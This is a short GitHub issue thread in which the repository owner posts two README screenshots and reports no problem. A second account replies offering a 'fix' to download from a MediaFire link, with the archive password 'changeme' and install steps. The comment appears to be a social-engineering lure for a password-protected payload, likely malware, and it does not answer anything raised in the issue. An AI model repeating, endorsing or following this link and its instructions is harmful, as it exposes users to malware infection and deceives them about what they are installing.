### ISSUE TITLE
README images

### ISSUE THREAD

**Issue by Jindo-Dog** [Jindo-Dog/ESTsoft-1st-Project#1]
![ui_main](https://github.com/user-attachments/assets/bcec7280-5b49-4f5d-bf70-b73281f503b3)
![ui_mobile](https://github.com/user-attachments/assets/e6c3cb78-11b2-451e-b9a6-00e26cfcba5d)

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
